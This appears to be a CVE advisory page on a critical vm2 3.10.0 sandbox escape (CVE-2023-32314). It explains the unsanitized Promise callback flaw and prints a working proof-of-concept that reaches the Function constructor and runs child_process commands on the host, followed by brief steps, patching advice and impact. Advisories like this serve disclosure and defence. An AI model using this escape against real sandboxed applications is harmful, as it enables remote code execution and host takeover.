vm2, Sandbox Escape, CVE-2023-32314 (Critical)

Listen to this Post

The vulnerability in vm2 version 3.10.0 stems from incomplete sanitization of Promise callback functions within the sandbox environment. In lib/setup-sandbox.js, the library sanitizes callbacks for localPromise.prototype.then but neglects to sanitize those for globalPromise.prototype.then. Since asynchronous functions return globalPromise objects, this oversight allows attackers to bypass sandbox protections. By constructing an error with a Symbol as its name and invoking an async function, the error stack becomes accessible through a promise. When the promise is caught, the error constructor is retrieved, leading to the Function constructor. This enables the execution of arbitrary code by requiring native modules like child_process. The provided exploit code demonstrates this: it creates a Symbol-based error, uses an async function to capture its stack, and within the catch handler, instantiates a new Function to run system commands. Consequently, the sandbox escape permits full remote code execution on the host system, compromising security.
Platform: vm2
Version: 3.10.0
Vulnerability: Sandbox Escape
Severity: Critical
Date: 2023-05-15

Prediction: 2023-05-20

What Undercode Say:

node exploit.js
const { VM } = require("vm2");
const code = <code>const error = new Error();
error.name = Symbol();
const f = async () => error.stack;
const promise = f();
promise.catch(e => {
const Error = e.constructor;
const Function = Error.constructor;
const f = new Function(
"process.mainModule.require('child_process').execSync('echo HELLO WORLD!', { stdio: 'inherit' })"
);
f();
});</code>;
new VM().run(code);

How Exploit:

Create Symbol error.

Use async function.

Catch promise.

Access Function constructor.

Execute arbitrary code.

Protection from this CVE:

Update vm2 version.

Apply patch.

Disable vulnerable features.

Impact:

Remote Code Execution.

Sandbox Compromise.

Host Takeover.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top